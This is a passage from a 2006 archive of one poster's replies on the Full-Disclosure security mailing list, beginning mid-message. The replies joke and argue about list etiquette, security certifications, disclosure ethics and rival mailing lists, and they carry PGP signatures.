"sender verification," unless "not" separates them. It is obnoxious and
places the burden of your lack of effort or knowledge onto the sender.

Randy

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] ................................................Oo...............................................

[Randal T. Rioux]

nirvana wrote:
> People like
> 
> Valdis
> N3td3v
> Todd Towles
> 
> Shud fuck themselves off
> 

Did you just put Valdis in the same category as netdev?

I think my head is going to explode.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] PassMark?

[Randal T. Rioux]

-BEGIN PGP SIGNED MESSAGE-
Hash: RIPEMD160

Gary E. Miller wrote:
> Yo All!
> 
> I thought I'd actually risk a real security question here.
> 
> Any one seen the "PassMark" (www.passmarksecurity.com) security system
> in action?
> 

Yes.

Bank of Bangalore^H^H^H^H^H^H^H^H^HAmerica uses it, as well as a recent
financial client corp. of mine.

I'm not impressed with it.

Randy

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2.2 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFEjjYIRrGMQdCNGUERA5rnAJ94fz+ll9VzSazzp0zfhha8BwQURQCfYch0
o6/Swjo9ZIyc4Hsb7223koo=
=s8LO
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Tool Release - Tor Blocker

[Randal T. Rioux]

Jason Areff wrote:
> Those acronoyms prove that I know more than you apparently. Way to
> demonstrate your l33t hax0r skills.
> 
> Jason Areff
> CISSP, A+, MCSE, Security+ == Better than Steven Rakick
> 

I haven't heard someone brag about an MCSE in almost a decade.

The + ones are just pay to have.

Even I have a CISSP. It just took people a couple years to figure out
how to hack that test (aka READ a study guide).

I'm sorry, but as someone with letters and crap as well, I must say I
like to save them for the resume and job/contract hunting. Managers
care. People that actually play in this sandbox of ours don't.

Randy

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Full Disclosure "Code of conduct"

[Randal T. Rioux]

-BEGIN PGP SIGNED MESSAGE-
Hash: RIPEMD160

Aaron Gray wrote:
> I am suggesting that we all cooperate and produce a "Code of Conduct"
> for participating on the Full Disclosure mailing list.
>  
> Suggested start :-
>  
> 1) No Swearing
> 2) No slagging others off
> 3) No selling of exploits and vulnerabilities

4) Rename it "SecurityFocus FD"

Your number 2 is half the fun of this list. It makes people think twice
before posting something senseless. Though it isn't 100% effective, it
is better than having a paid moderator deleting messages.

Put in a swear filter. Net Nanny or something.

I do appreciate your goal, however this is a dirty and nasty arena. It
was designed to be an alternative to the cleansed and censored corporate
controlled lists.

I must say, FD is still friendlier than the underground BBSs of the 80's
& 90's. Good times.


Randal T. Rioux | Procyon Labs
IT Security R&D and Consulting
Virtual: www.procyonlabs.com
Physical: DC / Baltimore
PGP: gpg --keyserver pgp.mit.edu --recv-keys 0xD08D1941


-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2.2 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFEXVkbRrGMQdCNGUERA8CxAJ95PqTgl/ybUa112N2GVzK7X/bBwACfY0wy
AHCtL10wRWtNXBbCJ/amTNw=
=kdaz
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] IE7 Zero Day

[Randal T. Rioux]

[EMAIL PROTECTED] wrote:
> If you are interested in bidding.  I can provide you wtih an 
> account to provide the funds.  Social Security numbers are for 
> American citizens only so don't assume I am such a person.
> 

I'll start the bidding at $1.25 USD. Do you take checks?

I have a slighty used half-liter bottle of Mountain Dew for trade if
you're willing to barter.

Let me know... I'm serious.

Randy

PS I found that the rotors on my Jeep wear down faster than they should.
Does anyone know a contact at Daimler/Chrylser that would be interested
in buying this vulnerability information? I don't have a fix yet though.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] MSIE (mshtml.dll) OBJECT tag vulnerability

[Randal T. Rioux]

-BEGIN PGP SIGNED MESSAGE-
Hash: RIPEMD160

Tim Bilbro wrote:
> You do a disservice to all IT shops by announcing these vulnerabilities
> before contacting the vendor. 

I think lame inaccurate "blogging" causes more harm than research and
result dissemination.

Seriously - those who think full disclosure is bad should think a little
more. Would you be happy if all software were more like the Bush
administration? Secrets are the results of corruption. If you write
bad/insecure software and charge out the ass for it - you bet I'd want
it to work and be as secure as advertised.



Randal T. Rioux | Procyon Labs
IT Security R&D and Consulting
Virtual: www.procyonlabs.com
Physical: DC / Baltimore
PGP: gpg --keyserver pgp.mit.edu --recv-keys 0xD08D1941

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFET/IvRrGMQdCNGUERAxkfAJ0bE+e3qTHJ+0idC6y0lcMM/xE/OwCfXLOY
9noRONs+WeuuV2UL0BpaWAw=
=zeBm
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] security at .edus

[Randal T. Rioux]

-BEGIN PGP SIGNED MESSAGE-
Hash: RIPEMD160

Brian Eaton wrote:
> On 4/22/06, Sol Invictus <[EMAIL PROTECTED]> wrote:
> 
>>What you don't realize is that just by posting here that an Educational 
>>Institution
>>is vulnerable to this,  Some Readers (not me) might already be scanning for
>>web vulnerabilities at these sites across the US.
> 
> I suspect the anonymous educational institution in question is hardly
> the only vulnerable site out there.  Universities tend to be fairly
> decentralized places, where academic freedom can count for a lot more
> than a secure network.  Plus a university network has fewer secrets to
> protect than a business.
> 

Tell that to the DoD sponsored research labs within many universities.

Randy

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFESyCERrGMQdCNGUERA7iZAJ43URV3IhCRIb0b+6LDoBg5zi+dqACdFlI7
88fAbReRVK534l0ZLqlsx6U=
=LrNi
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Google Groups e-mail disclosure in plain text

[Randal T. Rioux]

-BEGIN PGP SIGNED MESSAGE-
Hash: RIPEMD160

Rodrigo Barbosa wrote:
> On Wed, Apr 19, 2006 at 07:09:11AM +0100, n3td3v wrote:
> 
>>>On 4/19/06, Randal T. Rioux <[EMAIL PROTECTED]> wrote:
>>>I don't think the industry needs someone to "verify" an advisory for them.
> 
> 
> Actually, you are wrong there.
> 
> More than one company pays mine to do just that. The volume of information
> contained and the huge number of advisories can cost companies some big
> bucks.
> 
> Then again, my company states pretty clear on all contracts that we
> will only filter and analise the advisories, not produce original
> ones.
> 
> As for Secunia, I really can't comment.
> 

Fix your quoter. I didn't write that. n3td3v did.

Randy
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFERiozRrGMQdCNGUERA+x2AJ9RBarecedPpyPtqfsnDvF4PDvPowCdFIMa
ZdPQI2qL/Rugks5uc+Ru/Q0=
=oedH
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Google Groups e-mail disclosure in plain text

[Randal T. Rioux]

-BEGIN PGP SIGNED MESSAGE-
Hash: RIPEMD160

n3td3v wrote:

> If they did something special with their website like Securityfocus
> does, then I might be able to bare their illegal footer message spam,
> and their scene whore republication of advisories they claim are
> Secunia exclusives.

What does SF offer? Stale news and constant subliminal ads for Symantec
products? Google ads *vomit*? An abysmal mailing list moderated by a cat
sleeping on the delete button?

I don't care what is on Secunia's site or what they do. They let
everyone bitch, fight and we're better with it than without.

You're here. You must get something out of it to stay.

I hate the Bush regime - but I'm not moving to Canada!

Randy
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD4DBQFERc8aRrGMQdCNGUERA2T6AJiVsdDNOo6RoiXK2h3fVetaDV2OAJ0Wzjvs
U8xptEQR+Fr0+WyQZ+I8HA==
=mY8c
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Noise

[Randal T. Rioux]

No. He needs to disconnect from AOL because his sister needs the phone
and his mom just yelled to him in the basement to come up for dinner.

php0t wrote:
> You need a hug.
> 
> -Original Message-
> *From:* [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] *On Behalf Of *n3td3v
> *Sent:* Thursday, March 30, 2006 12:57 AM
> *To:* full-disclosure@lists.grok.org.uk
> *Subject:* Re: [Full-disclosure] Noise
> 
> I finished school 11 years ago, infact I left on my own accordance
> (when I was 14) because they were going to chuck me out of school
> anyway. I soon got involved in stealing cars, brekaing into houses,
> and taking goods from shops. All my criminal friends went to jail, I
> was the only one left. I started using computers to pass the time
> (when I was 18) when having "no one left to hang about with", and I
> used my knowledge of criminality to work out the bad guys at Yahoo.
> I then met an employee (who will remain unnamed) to act as an
> informant for Yahoo. I then started to find my own vulnerabilities
> to Yahoo, which I reported to them. They started disrespecting me, 
> I setup my own security group to show them that I could be a match
> against them and continue to compromise their systems. I then went
> on a public crusade to tell the public all about their flaws that I
> had been keeping secret for years. Their employees who thought were
> befriending me to keep in tap with info I had were told finally to
> f*** off just last week, and now there is no connection between
> n3td3v and the yahoo security team, infact, I mailed the official
> address and told them I wouldn't be mailign them ever again. And
> thats the current situation, upto date. Seiden at yahoo (security
> consultant/advisor/hacker) whatever you want to call him is now
> pissed off because he's getting no info feed into his corporate
> security team anymore... and the consultants and engineers who had
> opened dialog with me are now sitting in paranoia.
> 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: SendGate: Sendmail Multiple Vulnerabilities (Race Condition DoS, Memory Jumps, Integer Overflow)

[Randal T. Rioux]

-BEGIN PGP SIGNED MESSAGE-
Hash: RIPEMD160

Gadi Evron wrote:

> of security attitude I wonder why anybody believes OpenBSD is the most
> secure OS around.

No - that would be OpenVMS   :-)

At least until HP kills it.

Randy. still wondering what is 'open' about VMS

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFEJkoXRrGMQdCNGUERAxXeAJsGwsgHx3bIQPpQVA5rM+PEEZMn1QCff4qk
fgjq68/XYJXXmvVg7n84R6I=
=pIi8
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Fwd: SURROUNDED / SF & Symantec

[Randal T. Rioux]

-BEGIN PGP SIGNED MESSAGE-
Hash: RIPEMD160

Javor Ninov wrote:
> do you realize that your so-called popularity is based on the fact that
> FD is not moderated ? strange .. i don't see you on securityfocus.com
> 
> 
> n3td3v wrote:
> 
>>No THINK required, IS BIG, FACT.
>> 

Not to defend the mighty 'd3v, but securityfocus.com, aka Symantec, is
trash. They delete any posting to any of their owned lists that say even
the slightest bad thing about any of their weak products.

Despite the trolls, FD is the last great pasture of free security
discussion. The securityfocus lists are for clueless management types
looking to pick up buzzwords for their next big useless presentation to
the CEOs.

Randy
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFEIBKnRrGMQdCNGUERA23sAJ4xpl/9YwH/5eM+XR3KwmxT2givmwCdFYRd
pSmkEoRaD5eWtY9ZFRm4nGg=
=FpR4
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: Reported Google Vuln

[Randal T. Rioux]

Dave Korn wrote:
> nodialtone wrote:
> 
>>Google funzies.
>>
>>[Snip]
>>
>>Reference:
>>
>>http://seclists.org/lists/fulldisclosure/2006/Feb/0553.html
> 
> 
>   Ok, I give up.  Why are you posting a report to the full-disclosure list 
> to announce a post that was posted to... the full-disclosure list?  Is this 
> some kind of mail-loop joke?
> 
> 
> cheers,
>   DaveK

my head just exploded. guts hurt from laughing. thanks dave.

the dreaded fibonacci vulnerability!! it gets worse with each posting! ahh!

time for sleep...
randy
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/